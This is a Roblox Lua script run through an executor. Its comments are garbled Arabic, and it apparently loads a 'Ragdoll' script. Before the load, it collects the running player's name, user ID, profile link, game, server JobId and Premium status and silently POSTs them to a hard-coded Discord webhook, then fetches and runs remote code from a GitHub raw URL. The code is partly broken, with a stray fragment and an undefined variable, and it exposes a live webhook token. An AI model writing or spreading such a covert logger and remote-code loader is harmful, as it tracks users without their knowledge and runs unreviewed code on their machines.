local webhook = "https://discord.com/api/webhooks/1197486527136145418/FZSlSN2i0ptNY75WkDgnaat7Li1PopRbv87UyC4mP7oKL5AdttcIkv5Bz8X522FxbU3k"

-- Define the PlaceId variable
local PlaceId = game.PlaceId

-- Get the game name and game URL
-- ط§ط³ظ… ظ…ط§ط¨
local gameName = game:GetService("MarketplaceService"):GetProductInfo(PlaceId).Name
-- ط±ط§ط¨ط· ظ„ط¹ط¨ظ‡
local gameUrl = "https://www.roblox.com/games/" .. PlaceId
-- ط±ط§ط¨ط· ط¨ط±ظˆظپط§ظٹظ„
local profileUrl = "https://www.roblox.com/users/" .. game:GetService("Players").LocalPlayer.UserId .. "/profile"
-- ط¹ط¯ط¯ ط³ظٹط±ظپط±
local playerCount = #game:GetService("Players"):GetPlayers()
-- ط¨ط±ظٹظ…ظٹظ…
local Players = game:GetService("Players")
loca
local hasPremium = player.MembershipType == Enum.MembershipType.Premium

-- Create a JSON object to send to the webhook
local data = {
    ["content"] = "",
    ["embeds"] = {
        {
            ["title"] = "",
            ["description"] = ""
            .. "**Player Name:**  ```" .. game:GetService("Players").LocalPlayer.Name .. " ```\n"
            .. "**Player ID:** ```" .. game:GetService("Players").LocalPlayer.UserId .. "```\n"
            .. "**Player URL:** ```" .. profileUrl .. "```\n"
            .. "**Game Name:** ```" .. gameName .. "```\n"
            .. "**Game URL:** ```" .. gameUrl .. "```\n"
            .. "**Server JobId :** ```" .. game.JobId .. "```\n"
            .. "**Server Number players online :** ```" .. playerCount .. "```\n"
            .. "**Player Premium :** ```" .. if hasPremium then "yes " else "no"  .. "```\n"
        }
    }
}

-- Send the data to the webhook
local HS = game:GetService("HttpService"):JSONEncode(data)
local headers = {
    ["content-type"] = "application/json"
}

local data2 = {
    Url = webhook,
    Body = HS,
    Method = "POST",
    Headers = headers
}

request(data2)
loadstring(game:HttpGet("https://raw.githubusercontent.com/VR7ss/VR7/main/Ragdoll-VR7"))()
